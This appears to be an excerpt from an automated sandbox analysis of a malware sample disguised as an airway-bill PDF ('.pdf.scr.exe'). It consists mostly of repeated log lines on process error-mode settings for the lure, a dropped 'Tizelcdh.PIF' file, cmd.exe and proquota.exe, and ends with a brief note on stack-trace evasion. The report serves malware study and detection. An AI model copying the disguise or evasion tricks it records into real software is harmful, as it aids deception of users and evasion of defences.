                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
